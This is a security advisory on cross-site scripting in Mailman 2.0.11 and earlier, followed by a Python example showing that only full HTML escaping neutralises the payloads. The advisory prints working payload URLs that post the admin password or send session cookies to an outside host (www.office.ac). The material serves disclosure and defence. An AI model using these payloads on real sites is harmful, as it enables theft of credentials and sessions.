COMMAND

    Mailman cross-site scripting bug

SYSTEMS AFFECTED

    Mailman 2.0.11 and earlier

PROBLEM

    office [office@ukky.net] [office@office.ac] [http://www.office.ac/] says:

    Mailman is software to help manage electronic mail discussion lists,
    much like Majordomo or Smartmail. Mailman also has a web interface
    system.

    Example
    =======

    You can recognize the vulnerability with this type of URL:

        http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>

    and that proves that any (malicious) script code is possible on the
    web interface part of Mailman.

    For example, if you access this URL with Internet Explorer (other
    browsers are not affected by the URL), the page looks similar to the
    real one, but the admin password you enter and submit is sent to
    another malicious site (http://www.office.ac/). This URL is valid for
    version 2.0.10:

        http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br

    And Mailman 2.0.11 still has vulnerabilities: if you access these URLs
    with Internet Explorer (other browsers are not affected by these
    URLs), your cookie information for the mailman_site could be sent to
    another malicious site (http://www.office.ac/):

        http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

        http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>

SOLUTION

    Users should upgrade to Mailman 2.0.12 or later:

        http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html
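The two `adminpw` URLs above differ in a way that matters for the fix: the second contains no angle brackets at all, only a double quote that closes the attribute. The following is an added example, not Mailman's code and not part of the original advisory; the `TEMPLATE` markup and the bracket-stripping filter are assumptions made for illustration. It renders both values three ways and reports what markup a parser sees beyond the intended input field.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two adminpw URLs quoted in the advisory (host and list name are its placeholders).
FORM_HIJACK_URL = ('http://mailman_site/mailman_dirctory/admin/ml-name?adminpw='
                   '"></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br')
ATTRIBUTE_URL = ('http://mailman_site/mailman_dirctory/admin/ml-name?adminpw='
                 '"/onClick="window.open(\'http://www.office.ac/j.cgi?\'+document.cookie);')

TEMPLATE = '<input type="password" name="adminpw" value="%s">'  # constructed, not Mailman's markup

def adminpw_from(url):
    """Return the decoded adminpw parameter as a CGI would see it."""
    return parse_qs(urlsplit(url).query)["adminpw"][0]

def render_unescaped(value):
    """Vulnerable pattern: the request value is copied into the attribute as-is."""
    return TEMPLATE % value

def render_brackets_stripped(value):
    """Hypothetical partial fix: remove < and > but leave quotes alone."""
    return TEMPLATE % value.replace("<", "").replace(">", "")

def render_escaped(value):
    """Output encoding for an attribute context: &, <, >, " and ' become entities."""
    return TEMPLATE % html.escape(value, quote=True)

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.seen = []
    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, [name for name, _ in attrs]))

def injected_markup(rendered):
    """List every start tag that is not the intended <input type name value>."""
    parser = _Tags()
    parser.feed(rendered)
    parser.close()
    return [t for t in parser.seen if t != ("input", ["type", "name", "value"])]

if __name__ == "__main__":
    for url in (FORM_HIJACK_URL, ATTRIBUTE_URL):
        value = adminpw_from(url)
        for render in (render_unescaped, render_brackets_stripped, render_escaped):
            print(render.__name__, injected_markup(render(value)))
```

Only `render_escaped` returns an empty list for both values; stripping angle brackets still leaves an extra event-handler attribute on the input element.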